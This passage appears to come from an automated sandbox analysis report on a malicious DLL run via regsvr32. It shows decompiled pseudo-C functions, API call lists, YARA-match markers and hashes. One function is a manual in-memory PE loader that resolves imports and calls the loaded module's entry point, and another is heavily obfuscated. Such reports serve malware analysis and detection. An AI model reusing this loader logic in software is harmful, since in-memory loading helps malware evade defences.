            								if(_t105 != 0) {
            									E6D5104E0(_t101);
            									goto L37;
            								} else {
            									goto L35;
            								}
            							}
            							_t90 = _t96 + 8;
            							__eflags = _t96 - _t90;
            							asm("sbb eax, eax");
            							_t66 = _t60 & _t90;
            							_t87 = _t96 + 8;
            							__eflags = _t66 - 0x400;
            							if(_t66 > 0x400) {
            								__eflags = _t96 - _t87;
            								asm("sbb eax, eax");
            								_t101 = E6D50B438(_t87, _t66 & _t87);
            								_pop(_t87);
            								__eflags = _t101;
            								if(_t101 == 0) {
            									goto L35;
            								}
            								 *_t101 = 0xdddd;
            								L28:
            								_t101 =  &(_t101[4]);
            								goto L30;
            							}
            							__eflags = _t96 - _t87;
            							asm("sbb eax, eax");
            							E6D513490();
            							_t101 = _t107;
            							__eflags = _t101;
            							if(_t101 == 0) {
            								goto L35;
            							}
            							 *_t101 = 0xcccc;
            							goto L28;
            						}
            						_t70 = _a28;
            						if(_t70 == 0) {
            							goto L37;
            						}
            						_t125 = _t105 - _t70;
            						if(_t105 > _t70) {
            							goto L36;
            						}
            						_t71 = E6D50CD05(0, _t105, _t125, _a8, _a12, _t81, _t100, _a24, _t70, 0, 0, 0);
            						_t105 = _t71;
            						if(_t71 != 0) {
            							goto L37;
            						}
            						goto L36;
            					}
            					asm("sbb eax, eax");
            					_t72 = _t54 & _t95 + 0x00000008;
            					_t85 = _t95 + 8;
            					if((_t54 & _t95 + 0x00000008) > 0x400) {
            						__eflags = _t95 - _t85;
            						asm("sbb eax, eax");
            						_t81 = E6D50B438(_t85, _t72 & _t85);
            						_pop(_t85);
            						__eflags = _t81;
            						if(__eflags == 0) {
            							goto L36;
            						}
            						 *_t81 = 0xdddd;
            						L12:
            						_t81 =  &(_t81[4]);
            						goto L14;
            					}
            					asm("sbb eax, eax");
            					E6D513490();
            					_t81 = _t107;
            					if(_t81 == 0) {
            						goto L36;
            					}
            					 *_t81 = 0xcccc;
            					goto L12;
            				}
            			}



























            APIs
            • MultiByteToWideChar.KERNEL32(?,00000000,?,?,00000000,00000000,00000100,6D50DAF1,00000000,?,?,?,6D510751,?,?,00000100), ref: 6D51055A
            • MultiByteToWideChar.KERNEL32(?,00000001,?,?,00000000,?,?,?,?,6D510751,?,?,00000100,5EFC4D8B,?,?), ref: 6D5105E0
            • WideCharToMultiByte.KERNEL32(?,00000000,00000000,00000000,5EFC4D8B,00000100,00000000,00000000,?,00000400,00000000,?,00000000,00000000,00000000,00000000), ref: 6D5106DA
            • __freea.LIBCMT ref: 6D5106E7
              • Part of subcall function 6D50B438: HeapAlloc.KERNEL32(00000000,00000001,00000004,?,6D5107B0,00000001,00000000,?,6D50E12F,00000001,00000004,00000000,00000001,?,?,6D50B13D), ref: 6D50B46A
            • __freea.LIBCMT ref: 6D5106F0
            • __freea.LIBCMT ref: 6D510715
            Memory Dump Source
            • Source File: 00000002.00000002.385586279.000000006D501000.00000020.00000001.01000000.00000003.sdmp, Offset: 6D500000, based on PE: true
            • Associated: 00000002.00000002.385570851.000000006D500000.00000002.00000001.01000000.00000003.sdmp
            • Associated: 00000002.00000002.385653547.000000006D51B000.00000002.00000001.01000000.00000003.sdmp
            • Associated: 00000002.00000002.385728691.000000006D540000.00000004.00000001.01000000.00000003.sdmp
            • Associated: 00000002.00000002.385742413.000000006D541000.00000008.00000001.01000000.00000003.sdmp
            • Associated: 00000002.00000002.385767720.000000006D55C000.00000004.00000001.01000000.00000003.sdmp
            • Associated: 00000002.00000002.385779816.000000006D55F000.00000002.00000001.01000000.00000003.sdmp
            Joe Sandbox IDA Plugin
            • Snapshot File: hcaresult_2_2_6d500000_regsvr32.jbxd
            Similarity
            • API ID: ByteCharMultiWide__freea$AllocHeap
            • String ID:
            • API String ID: 3147120248-0
            • Opcode ID: f43acc1688a6faeb2c7c526abb56c143bdea0ccb07cc61f1cdedbf56f64febdb
            • Instruction ID: 562003cd55f713cf21eebfd6a6bb7fc1f8e39c98c76786d4e0855021e6c5d8ef
            • Opcode Fuzzy Hash: f43acc1688a6faeb2c7c526abb56c143bdea0ccb07cc61f1cdedbf56f64febdb
            • Instruction Fuzzy Hash: 25510972608217AFFB198E69CC81FBF37A9EF85754F124A2AFD24D6540DB34DCA08650
            Uniqueness

            Uniqueness Score: -1.00%

            C-Code - Quality: 93%
            			E027ADF29(WCHAR* __ecx) {
            				int _v8;
            				WCHAR* _v12;
            				WCHAR* _v16;
            				WCHAR* _v140;
            				WCHAR* _v144;
            				short _v664;
            				signed int _t28;
            				signed int _t29;
            				signed int _t30;
            				WCHAR* _t36;
            				int _t40;
            				signed int _t41;
            				int _t44;
            				signed int _t45;
            				WCHAR* _t49;
            				signed int _t51;
            				WCHAR* _t52;
            				void* _t53;
            
            				_v8 = _v8 & 0x00000000;
            				_v16 = __ecx;
            				_t51 = 0;
            				_t28 = CommandLineToArgvW(GetCommandLineW(),  &_v8);
            				_t44 = _v8;
            				_t41 = 0;
            				_v12 = _t28;
            				if(_t44 <= 0) {
            					L22:
            					_t29 = _t28 | 0xffffffff;
            					__eflags = _t29;
            					return _t29;
            				} else {
            					goto L1;
            				}
            				do {
            					L1:
            					_t49 =  *(_t28 + _t41 * 4);
            					_t30 =  *_t49 & 0x0000ffff;
            					if(_t30 != 0 && _t30 != 0xd && _t30 != 0xa && _t30 != 0x2d && _t30 != 0x2f && _t51 < 0x20) {
            						 *(_t53 + _t51 * 4 - 0x8c) = _t49;
            						_t40 = lstrlenW(_t49);
            						_t45 = 0;
            						if(_t40 <= 0) {
            							L11:
            							_t44 = _v8;
            							_t51 = _t51 + 1;
            							goto L12;
            						} else {
            							goto L8;
            						}
            						do {
            							L8:
            							if(_t49[_t45] == 0x2c) {
            								_t49[_t45] = 0;
            							}
            							_t45 = _t45 + 1;
            						} while (_t45 < _t40);
            						goto L11;
            					}
            					L12:
            					_t28 = _v12;
            					_t41 = _t41 + 1;
            				} while (_t41 < _t44);
            				if(_t51 != 1) {
            					if(__eflags <= 0) {
            						goto L22;
            					}
            					_t52 = _v140;
            					L17:
            					if( *_t52 == 0x5c || _t52[1] == 0x3a) {
            						lstrcpynW(_v16, _t52, 0x104);
            					} else {
            						GetCurrentDirectoryW(0x104,  &_v664);
            						_push(0);
            						_push(_t52);
            						_push(0x27bc9d8);
            						_t36 = E027A9BF7( &_v664);
            						_v12 = _t36;
            						lstrcpynW(_v16, _t36, 0x104);
            						E027A8D86( &_v12, 0xfffffffe);
            					}
            					return 0;
            				}
            				_t52 = _v144;
            				goto L17;
            			}






















            APIs
            • GetCommandLineW.KERNEL32 ref: 027ADF3E
            • CommandLineToArgvW.SHELL32(00000000,00000000), ref: 027ADF49
            • lstrlenW.KERNEL32 ref: 027ADF8B
            • GetCurrentDirectoryW.KERNEL32(00000104,?), ref: 027ADFE4
            • lstrcpynW.KERNEL32(?,00000000,00000104), ref: 027AE009
            • lstrcpynW.KERNEL32(?,?,00000104), ref: 027AE027
            Memory Dump Source
            • Source File: 00000002.00000002.385314115.00000000027A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 027A0000, based on PE: true
            Joe Sandbox IDA Plugin
            • Snapshot File: hcaresult_2_2_27a0000_regsvr32.jbxd
            Yara matches
            Similarity
            • API ID: CommandLinelstrcpyn$ArgvCurrentDirectorylstrlen
            • String ID:
            • API String ID: 1259063344-0
            • Opcode ID: 2aa5857b35f8b06892ae48f8f84d8e769949dc7499d35add6017edbc3028caae
            • Instruction ID: 8efa5718db0d841e3506bef11e86ab8b88b928e83daf4306d58ba006169125a7
            • Opcode Fuzzy Hash: 2aa5857b35f8b06892ae48f8f84d8e769949dc7499d35add6017edbc3028caae
            • Instruction Fuzzy Hash: B0313771C00115EBDF35AB54C898FAFB7B8EF86734F20866AE521E24A0E7709991CF50
            Uniqueness

            Uniqueness Score: -1.00%

            APIs
            • SysAllocString.OLEAUT32(00000000), ref: 027AE76D
            • SysAllocString.OLEAUT32(?), ref: 027AE775
            • SysAllocString.OLEAUT32(00000000), ref: 027AE789
            • SysFreeString.OLEAUT32(?), ref: 027AE804
            • SysFreeString.OLEAUT32(?), ref: 027AE807
            • SysFreeString.OLEAUT32(?), ref: 027AE80C
            Memory Dump Source
            • Source File: 00000002.00000002.385314115.00000000027A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 027A0000, based on PE: true
            Joe Sandbox IDA Plugin
            • Snapshot File: hcaresult_2_2_27a0000_regsvr32.jbxd
            Yara matches
            Similarity
            • API ID: String$AllocFree
            • String ID:
            • API String ID: 344208780-0
            • Opcode ID: 3e60fe9168a5ef368c663a57889438ab0e01c12036645fcbd1ed481891faab8f
            • Instruction ID: da755325e0ad7d61f81d5ea67a73b323f75426c0f23b66558f74137fa6c6f81b
            • Opcode Fuzzy Hash: 3e60fe9168a5ef368c663a57889438ab0e01c12036645fcbd1ed481891faab8f
            • Instruction Fuzzy Hash: CC21FB75900219FFDB00DFA5CC88DAEBBBDEF88254B2045AAF515A7250D771AE01CB60
            Uniqueness

            Uniqueness Score: -1.00%

            C-Code - Quality: 95%
            			E6D509791(void* __ecx, void* __edx) {
            				void* _t4;
            				void* _t11;
            				void* _t16;
            				long _t26;
            				void* _t29;
            
            				if( *0x6d55ce10 != 0xffffffff) {
            					_t26 = GetLastError();
            					_t11 = E6D509A8E(__eflags,  *0x6d55ce10);
            					__eflags = _t11 - 0xffffffff;
            					if(_t11 == 0xffffffff) {
            						L5:
            						_t11 = 0;
            					} else {
            						__eflags = _t11;
            						if(__eflags == 0) {
            							_t4 = E6D509AC8(__eflags,  *0x6d55ce10, 0xffffffff);
            							_pop(_t16);
            							__eflags = _t4;
            							if(_t4 != 0) {
            								_t29 = E6D50B523(_t16, 1, 0x28);
            								__eflags = _t29;
            								if(__eflags == 0) {
            									L8:
            									_t11 = 0;
            									E6D509AC8(__eflags,  *0x6d55ce10, 0);
            								} else {
            									__eflags = E6D509AC8(__eflags,  *0x6d55ce10, _t29);
            									if(__eflags != 0) {
            										_t11 = _t29;
            										_t29 = 0;
            										__eflags = 0;
            									} else {
            										goto L8;
            									}
            								}
            								E6D50B3FE(_t29);
            							} else {
            								goto L5;
            							}
            						}
            					}
            					SetLastError(_t26);
            					return _t11;
            				} else {
            					return 0;
            				}
            			}









            APIs
            • GetLastError.KERNEL32(00000001,?,6D509584,6D5084B2,6D5080FB,?,6D50830B,?,00000001,?,?,00000001,?,6D53E618,0000000C,6D5083F4), ref: 6D50979F
            • ___vcrt_FlsGetValue.LIBVCRUNTIME ref: 6D5097AD
            • ___vcrt_FlsSetValue.LIBVCRUNTIME ref: 6D5097C6
            • SetLastError.KERNEL32(00000000,6D50830B,?,00000001,?,?,00000001,?,6D53E618,0000000C,6D5083F4,?,00000001,?), ref: 6D509818
            Memory Dump Source
            • Source File: 00000002.00000002.385586279.000000006D501000.00000020.00000001.01000000.00000003.sdmp, Offset: 6D500000, based on PE: true
            • Associated: 00000002.00000002.385570851.000000006D500000.00000002.00000001.01000000.00000003.sdmp
            • Associated: 00000002.00000002.385653547.000000006D51B000.00000002.00000001.01000000.00000003.sdmp
            • Associated: 00000002.00000002.385728691.000000006D540000.00000004.00000001.01000000.00000003.sdmp
            • Associated: 00000002.00000002.385742413.000000006D541000.00000008.00000001.01000000.00000003.sdmp
            • Associated: 00000002.00000002.385767720.000000006D55C000.00000004.00000001.01000000.00000003.sdmp
            • Associated: 00000002.00000002.385779816.000000006D55F000.00000002.00000001.01000000.00000003.sdmp
            Joe Sandbox IDA Plugin
            • Snapshot File: hcaresult_2_2_6d500000_regsvr32.jbxd
            Similarity
            • API ID: ErrorLastValue___vcrt_
            • String ID:
            • API String ID: 3852720340-0
            • Opcode ID: 427f29a7f57f7ae628c1ed0267d58402269bbcf32bc578fe66ca0013a7e5a65e
            • Instruction ID: 945bb50c419f9a594c87d5009da16ff5aa78d712236e7cd96445faaea6ed250b
            • Opcode Fuzzy Hash: 427f29a7f57f7ae628c1ed0267d58402269bbcf32bc578fe66ca0013a7e5a65e
            • Instruction Fuzzy Hash: FE01F53210D2136EAF1F16786C857772B79EB837B872E0629E23048DD8EF524C609A80
            Uniqueness

            Uniqueness Score: -1.00%

            APIs
            • GetModuleHandleExW.KERNEL32(00000000,mscoree.dll,00000000,?,?,?,6D50A65C,?,?,6D50A5FC,?,6D53E678,0000000C,6D50A72F,00000000,00000000), ref: 6D50A6CB
            • GetProcAddress.KERNEL32(00000000,CorExitProcess), ref: 6D50A6DE
            • FreeLibrary.KERNEL32(00000000,?,?,?,6D50A65C,?,?,6D50A5FC,?,6D53E678,0000000C,6D50A72F,00000000,00000000,00000001,6D508275), ref: 6D50A701
            Strings
            Memory Dump Source
            • Source File: 00000002.00000002.385586279.000000006D501000.00000020.00000001.01000000.00000003.sdmp, Offset: 6D500000, based on PE: true
            • Associated: 00000002.00000002.385570851.000000006D500000.00000002.00000001.01000000.00000003.sdmp
            • Associated: 00000002.00000002.385653547.000000006D51B000.00000002.00000001.01000000.00000003.sdmp
            • Associated: 00000002.00000002.385728691.000000006D540000.00000004.00000001.01000000.00000003.sdmp
            • Associated: 00000002.00000002.385742413.000000006D541000.00000008.00000001.01000000.00000003.sdmp
            • Associated: 00000002.00000002.385767720.000000006D55C000.00000004.00000001.01000000.00000003.sdmp
            • Associated: 00000002.00000002.385779816.000000006D55F000.00000002.00000001.01000000.00000003.sdmp
            Joe Sandbox IDA Plugin
            • Snapshot File: hcaresult_2_2_6d500000_regsvr32.jbxd
            Similarity
            • API ID: AddressFreeHandleLibraryModuleProc
            • String ID: CorExitProcess$mscoree.dll
            • API String ID: 4061214504-1276376045
            • Opcode ID: 7dc49902eb13282a37b9fb3a5ef3dcc694164543e200050a75a590d1e1ffc866
            • Instruction ID: 2107d41b333920de5aa8509b588315326755455225463b455f804226b95c24df
            • Opcode Fuzzy Hash: 7dc49902eb13282a37b9fb3a5ef3dcc694164543e200050a75a590d1e1ffc866
            • Instruction Fuzzy Hash: 1FF06271900219BBCF09AF90CC49FBD7FB5EF06352F024064F825A2A50DF719A80CB91
            Uniqueness

            Uniqueness Score: -1.00%

            C-Code - Quality: 20%
            			E027B3DE4(intOrPtr _a4, intOrPtr _a8, intOrPtr* _a12, CHAR* _a16, intOrPtr _a20) {
            				signed int _v5;
            				signed short _v12;
            				intOrPtr* _v16;
            				intOrPtr _v20;
            				signed int* _v24;
            				unsigned int _v28;
            				signed short* _v32;
            				struct HINSTANCE__* _v36;
            				signed int _v40;
            				signed int _v44;
            				intOrPtr* _v48;
            				signed short* _v52;
            				intOrPtr _v56;
            				unsigned int _v60;
            				intOrPtr _v64;
            				_Unknown_base(*)()* _v68;
            				signed int _v72;
            				intOrPtr _v76;
            				intOrPtr _v80;
            				intOrPtr _v84;
            				unsigned int _v88;
            				intOrPtr _v92;
            				signed int _v96;
            				intOrPtr _v100;
            				intOrPtr _v104;
            				intOrPtr _v108;
            				intOrPtr _v112;
            				CHAR* _v116;
            				signed int _v120;
            				intOrPtr _v124;
            				signed int _v128;
            				signed int _v132;
            				signed int _t216;
            				signed int _t233;
            				void* _t273;
            				signed int _t278;
            				signed int _t280;
            				intOrPtr _t320;
            
            				_v44 = _v44 & 0x00000000;
            				_v84 =  *((intOrPtr*)(_a4 + 0x3c)) + _a4;
            				_v20 = _v84;
            				_t320 = _a4 -  *((intOrPtr*)(_v20 + 0x34));
            				_v64 = _t320;
            				if(_t320 == 0) {
            					L13:
            					while(0 != 0) {
            					}
            					_push(8);
            					if( *((intOrPtr*)(_v20 + 0xbadc25)) == 0) {
            						L35:
            						if(_a16 == 0) {
            							L54:
            							_v80 =  *((intOrPtr*)(_v20 + 0x28)) + _a4;
            							while(0 != 0) {
            							}
            							if(_a12 != 0) {
            								 *_a12 = _v80;
            							}
            							 *((intOrPtr*)(_v20 + 0x34)) = _a4;
            							_v124 = _v80(_a4, 1, _a8);
            							while(0 != 0) {
            							}
            							if(_v124 != 0) {
            								if(_v44 == 0) {
            									L77:
            									return 1;
            								}
            								if(_a20 != 1) {
            									if(_a20 != 2) {
            										L75:
            										while(0 != 0) {
            										}
            										goto L77;
            									}
            									while(0 != 0) {
            									}
            									_v132 = _v44;
            									goto L75;
            								}
            								while(0 != 0) {
            								}
            								_v44();
            								goto L75;
            							}
            							while(0 != 0) {
            							}
            							return 0;
            						}
            						while(0 != 0) {
            						}
            						_push(8);
            						if( *((intOrPtr*)(_v20 + 0x78)) == 0) {
            							goto L54;
            						}
            						_v128 = 0x80000000;
            						_t216 = 8;
            						_v76 = _a4 +  *((intOrPtr*)(_v20 + 0x78 + _t216 * 0));
            						_v108 = _a4 +  *((intOrPtr*)(_v76 + 0x20));
            						_v112 = _a4 +  *((intOrPtr*)(_v76 + 0x1c));
            						_v104 =  *((intOrPtr*)(_v76 + 0x18));
            						while(0 != 0) {
            						}
            						_v40 = _v40 & 0x00000000;
            						while(_v40 < _v104) {
            							_v116 = _a4 +  *((intOrPtr*)(_v108 + _v40 * 4));
            							_v120 = _a4 +  *((intOrPtr*)(_v112 + _v40 * 4));
            							if(lstrcmpA(_v116, _a16) != 0) {
            								_v40 = _v40 + 1;
            								continue;
            							}
            							while(0 != 0) {
            							}
            							_v44 = _v120;
            							break;
            						}
            						if(_v44 != 0) {
            							goto L54;
            						}
            						while(0 != 0) {
            						}
            						return 0xffffffff;
            					}
            					_v96 = 0x80000000;
            					_t233 = 8;
            					_v16 = _a4 +  *((intOrPtr*)(_v20 + (_t233 << 0) + 0x78));
            					while( *((intOrPtr*)(_v16 + 0xc)) != 0) {
            						_v36 = GetModuleHandleA( *((intOrPtr*)(_v16 + 0xc)) + _a4);
            						if(_v36 == 0) {
            							_v36 = LoadLibraryA( *((intOrPtr*)(_v16 + 0xc)) + _a4);
            						}
            						if(_v36 != 0) {
            							if( *_v16 == 0) {
            								_v24 =  *((intOrPtr*)(_v16 + 0x10)) + _a4;
            							} else {
            								_v24 =  *_v16 + _a4;
            							}
            							_v72 = _v72 & 0x00000000;
            							while( *_v24 != 0) {
            								if(( *_v24 & _v96) == 0) {
            									_v100 =  *_v24 + _a4;
            									_v68 = GetProcAddress(_v36, _v100 + 2);
            								} else {
            									_v68 = GetProcAddress(_v36,  *_v24 & 0x0000ffff);
            								}
            								if( *((intOrPtr*)(_v16 + 0x10)) == 0) {
            									 *_v24 = _v68;
            								} else {
            									 *( *((intOrPtr*)(_v16 + 0x10)) + _a4 + _v72) = _v68;
            								}
            								_v24 =  &(_v24[1]);
            								_v72 = _v72 + 4;
            							}
            							_v16 = _v16 + 0x14;
            							continue;
            						} else {
            							_t273 = 0xfffffffd;
            							return _t273;
            						}
            					}
            					goto L35;
            				}
            				_t278 = 8;
            				_v52 = _a4 +  *((intOrPtr*)(_v20 + 0x78 + _t278 * 5));
            				_t280 = 8;
            				_v56 =  *((intOrPtr*)(_v20 + 0x7c + _t280 * 5));
            				while(0 != 0) {
            				}
            				while(_v56 > 0) {
            					_v28 = _v52[2];
            					_v56 = _v56 - _v28;
            					_v28 = _v28 - 8;
            					_v28 = _v28 >> 1;
            					_v32 =  &(_v52[4]);
            					_v92 = _a4 +  *_v52;
            					_v60 = _v28;
            					while(1) {
            						_v88 = _v60;
            						_v60 = _v60 - 1;
            						if(_v88 == 0) {
            							break;
            						}
            						_v5 = ( *_v32 & 0x0000ffff) >> 0xc;
            						_v12 =  *_v32 & 0xfff;
            						_v48 = (_v12 & 0x0000ffff) + _v92;
            						if((_v5 & 0x000000ff) != 3) {
            							if((_v5 & 0x000000ff) == 0xa) {
            								 *_v48 =  *_v48 + _v64;
            							}
            						} else {
            							 *_v48 =  *_v48 + _v64;
            						}
            						_v32 =  &(_v32[1]);
            					}
            					_v52 = _v32;
            				}
            				goto L13;
            			}










































            APIs
            • GetModuleHandleA.KERNEL32(00000000), ref: 027B3F4B
            • LoadLibraryA.KERNEL32(00000000), ref: 027B3F64
            • GetProcAddress.KERNEL32(00000000,?), ref: 027B3FC0
            • GetProcAddress.KERNEL32(00000000,?), ref: 027B3FDF
            • lstrcmpA.KERNEL32(?,00000000), ref: 027B40D0
            Memory Dump Source
            • Source File: 00000002.00000002.385314115.00000000027A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 027A0000, based on PE: true
            Joe Sandbox IDA Plugin
            • Snapshot File: hcaresult_2_2_27a0000_regsvr32.jbxd
            Yara matches
            Similarity
            • API ID: AddressProc$HandleLibraryLoadModulelstrcmp
            • String ID:
            • API String ID: 1872726118-0
            • Opcode ID: 93ce4f3db7e5761cc2ac9aa22691931d4237ec4f6c8e74e69c8484881b9a097d
            • Instruction ID: 764ef692f17fc026bc4fd2badb539aa5d58a1c90a8fc63a5d5b883d3040c21ed
            • Opcode Fuzzy Hash: 93ce4f3db7e5761cc2ac9aa22691931d4237ec4f6c8e74e69c8484881b9a097d
            • Instruction Fuzzy Hash: 15E18D75E00219DFCB15CFA8C8A4BEDBBB1BF08354F1485AAE815AB391D734A981CF54
            Uniqueness

            Uniqueness Score: -1.00%

            Strings
            Memory Dump Source
            • Source File: 00000002.00000002.385314115.00000000027A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 027A0000, based on PE: true
            Joe Sandbox IDA Plugin
            • Snapshot File: hcaresult_2_2_27a0000_regsvr32.jbxd
            Yara matches
            Similarity
            • API ID:
            • String ID: @$\u%04X$\u%04X\u%04X
            • API String ID: 0-2132903582
            • Opcode ID: 3f1537d7d41d111c4a2e8257874e6a011421a15b3a3a8a62b390bd330c33fc0d
            • Instruction ID: 0033029c1b09427bc3af2abf0a109bbd9574781c2651e6ae3b016049e306b0ee
            • Opcode Fuzzy Hash: 3f1537d7d41d111c4a2e8257874e6a011421a15b3a3a8a62b390bd330c33fc0d
            • Instruction Fuzzy Hash: 7041F571B1020997DB2B4A6C8CBDBFF3B69DF42218F940025FF1AE6244F3619991C6A5
            Uniqueness

            Uniqueness Score: -1.00%

            C-Code - Quality: 83%
            			E027B33F7(void* __edi, char* _a4, intOrPtr _a8, long long _a12, signed int _a20) {
            				signed int _t12;
            				signed int _t13;
            				signed int _t23;
            				void* _t30;
            				char* _t31;
            				char* _t33;
            				char* _t35;
            				char* _t37;
            				char* _t38;
            				long long* _t40;
            
            				_t30 = __edi;
            				_t12 = _a20;
            				if(_t12 == 0) {
            					_t12 = 0x11;
            				}
            				_t35 = _a4;
            				_push(_t25);
            				 *_t40 = _a12;
            				_push(_t12);
            				_push("%.*g");
            				_push(_a8);
            				_push(_t35);
            				L027B3550();
            				_t23 = _t12;
            				if(_t23 < 0 || _t23 >= _a8) {
            					L16:
            					_t13 = _t12 | 0xffffffff;
            					goto L17;
            				} else {
            					E027B33D0(_t12, _t35);
            					if(strchr(_t35, 0x2e) != 0 || strchr(_t35, 0x65) != 0) {
            						L8:
            						_push(_t30);
            						_t37 = strchr(_t35, 0x65);
            						_t31 = _t37;
            						if(_t37 == 0) {
            							L15:
            							_t13 = _t23;
            							L17:
            							return _t13;
            						}
            						_t38 = _t37 + 1;
            						_t33 = _t31 + 2;
            						if( *_t38 == 0x2d) {
            							_t38 = _t33;
            						}
            						while( *_t33 == 0x30) {
            							_t33 = _t33 + 1;
            						}
            						if(_t33 != _t38) {
            							E027A8E72(_t38, _t33, _t23 - _t33 + _a4);
            							_t23 = _t23 + _t38 - _t33;
            						}
            						goto L15;
            					} else {
            						_t6 = _t23 + 3; // 0x27b1be2
            						_t12 = _t6;
            						if(_t12 >= _a8) {
            							goto L16;
            						}
            						_t35[_t23] = 0x302e;
            						( &(_t35[2]))[_t23] = 0;
            						_t23 = _t23 + 2;
            						goto L8;
            					}
            				}
            			}














            APIs
            Strings
            Memory Dump Source
            • Source File: 00000002.00000002.385314115.00000000027A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 027A0000, based on PE: true
            Joe Sandbox IDA Plugin
            • Snapshot File: hcaresult_2_2_27a0000_regsvr32.jbxd
            Yara matches
            Similarity
            • API ID: strchr$_snprintf
            • String ID: %.*g
            • API String ID: 3619936089-952554281
            • Opcode ID: c64953c20d587f9aa8f1c503451e926e865734f0879017c222c2f947e0914148
            • Instruction ID: e5888ebdd1462f6116a1ea8b89db4648e17a286165222e70c7c92a12ca583d73
            • Opcode Fuzzy Hash: c64953c20d587f9aa8f1c503451e926e865734f0879017c222c2f947e0914148
            • Instruction Fuzzy Hash: 55213672644A2526EB239E68DC89FFB37989F00728F1441E9FD049A280FBB4D9C047D5
            Uniqueness

            Uniqueness Score: -1.00%

            C-Code - Quality: 46%
            			E6D50768E() {
            				intOrPtr _t198;
            				signed int _t205;
            				intOrPtr _t206;
            				signed int _t219;
            				struct _CRITICAL_SECTION* _t226;
            				signed int _t238;
            				intOrPtr _t244;
            				void* _t251;
            				signed int _t276;
            				signed int _t280;
            				void* _t284;
            				intOrPtr _t300;
            				signed int _t301;
            				signed int _t305;
            				intOrPtr _t307;
            				signed int _t317;
            				signed int _t318;
            				signed int _t322;
            				signed int _t329;
            				void* _t331;
            				intOrPtr _t332;
            				intOrPtr _t334;
            				intOrPtr _t335;
            				signed int _t336;
            				signed int _t341;
            				void* _t350;
            				signed int _t351;
            				intOrPtr _t353;
            				void* _t355;
            				intOrPtr _t357;
            				signed int* _t358;
            				intOrPtr _t363;
            				signed int _t365;
            				void* _t371;
            				void* _t372;
            				void* _t373;
            
            				_t307 =  *((intOrPtr*)(_t371 + 0x54));
            				_t357 =  *((intOrPtr*)(_t371 + 0x68));
            				 *((intOrPtr*)(_t371 + 0xc)) = _t307 + 0x41e;
            				_t363 =  *((intOrPtr*)(_t371 + 0x54)) + 0xfffffd78;
            				_t353 =  *((intOrPtr*)(_t371 + 0x78));
            				 *((intOrPtr*)(_t371 + 0x14)) = _t307 + 0x140;
            				_t300 = _t357 + 0x6f9;
            				 *((intOrPtr*)(_t371 + 0x5c)) = _t363;
            				 *((intOrPtr*)(_t371 + 0x18)) = _t307 - 0x2872;
            				_push(_t357);
            				 *((intOrPtr*)(_t371 + 0x80)) =  *((intOrPtr*)(_t371 + 0x80)) + 0x956;
            				 *((intOrPtr*)(_t371 + 0x20)) = _t353 + 0xb56;
            				_t332 = _t353 - 0x1e7b;
            				 *((intOrPtr*)(_t371 + 0x7c)) = _t332;
            				 *((intOrPtr*)(_t371 + 0x28)) = _t307 - 0x2db;
            				 *((intOrPtr*)(_t371 + 0x70)) = _t357 - 0x69;
            				_push(_t307 + 0x32);
            				_push(_t363 + 0xfffffe4e);
            				 *((intOrPtr*)(_t371 + 0x2c)) = _t300;
            				_push(_t300 - 0x762);
            				_push( *((intOrPtr*)(_t371 + 0x78)));
            				_push(_t307 - 0x984);
            				_push(_t307 - 0x984);
            				_push(_t300 - 0xe15);
            				_push( *((intOrPtr*)(_t371 + 0x80)) + 0xfffffea1);
            				_push(_t300 - 0x547);
            				_push(_t357 + 0x52c);
            				_push(_t307);
            				_push(_t357 - 0xea);
            				_push(_t332 + 0x28a4);
            				_t365 = E6D515588();
            				_t198 =  *((intOrPtr*)(_t371 + 0x98));
            				_t334 =  *((intOrPtr*)(_t371 + 0x50)) + 0x1e7b;
            				 *((intOrPtr*)(_t371 + 0x8c)) = _t334;
            				_push(_t198 - 0x3c4);
            				_push(_t300 - 0xda2);
            				_push(_t334);
            				_push( *((intOrPtr*)(_t371 + 0xbc)) + 0x269);
            				_push(_t357);
            				_push(_t198 + 0xe2);
            				_t41 = _t365 - 0x1b2; // -434
            				_push( *((intOrPtr*)(_t371 + 0xb0)) + 0x42f);
            				_t358 =  *(_t371 + 0xc0);
            				_push(_t357 + 0x43a);
            				_push(_t300 - 0x1dd);
            				_push(_t358);
            				_t205 = E6D51450E();
            				_t335 =  *((intOrPtr*)(_t371 + 0x78));
            				_t301 = _t205;
            				_t206 =  *((intOrPtr*)(_t371 + 0xd0));
            				_t372 = _t371 + 0x64;
            				_push(_t206 + 0x977);
            				_push(_t206 + 0x344);
            				_push(_t335 - 0x7c9);
            				_t52 = _t301 + 0x71c; // 0x71c
            				_push(_t358);
            				_push( *((intOrPtr*)(_t372 + 0x64)) + 0x1a7);
            				_push( *((intOrPtr*)(_t372 + 0x7c)));
            				_push(_t353 - 0x88);
            				_push(_t335 + 0x111);
            				_push(_t353 + 0x632);
            				_push( *((intOrPtr*)(_t372 + 0x38)) + 0xfffff89e);
            				_t58 = _t365 - 0x21b; // -539
            				_push( *((intOrPtr*)(_t372 + 0x8c)) + 0x75c);
            				_t60 = _t365 - 0x560; // -1376
            				_t61 = _t365 + 0x129; // 0x129
            				_t219 = E6D513E64();
            				_t373 = _t372 + 0x3c;
            				 *(_t373 + 0x28) = _t219;
            				if(_t301 == _t353) {
            					_t336 =  *(_t373 + 0x24);
            					if(_t301 < _t336 + 0x90e) {
            						_t65 = _t301 + 0xcfd; // 0xcfd
            						_t355 = _t65;
            						if( *(_t373 + 0x14) == _t355) {
            							_t317 = _t358[0x52];
            							 *(_t373 + 0x64) = _t317;
            							_t358[0xa] = (_t358[0x2f] & _t336 & _t301) * _t358[0xa];
            							_t226 =  *(_t373 + 0x7c) | 0x00002ac3;
            							 *(_t373 + 0x50) = _t226;
            							if(_t317 > _t226) {
            								_t318 =  *(_t373 + 0x20);
            								 *(_t373 + 0x28) = _t301 ^  *(_t373 + 0x1c);
            								 *(_t373 + 0x24) = _t336 ^ 0x00001df3;
            								 *(_t373 + 0x14) = _t301 * 0x00001e7b ^ 0x00002597;
            								_t106 = _t365 - 0x2ea5; // -11941
            								 *(_t373 + 0x30) = _t106 * _t318;
            								 *(_t373 + 0x34) = _t318 | _t336 |  *(_t373 + 0x1c);
            								_t238 =  *(_t373 + 0x78);
            								 *(_t373 + 0x38) = _t238 & _t301;
            								 *(_t373 + 0x3c) = _t365 * 0x29b2;
            								 *((intOrPtr*)(_t373 + 0x40)) = _t238 + _t365;
            								_t341 =  *_t358;
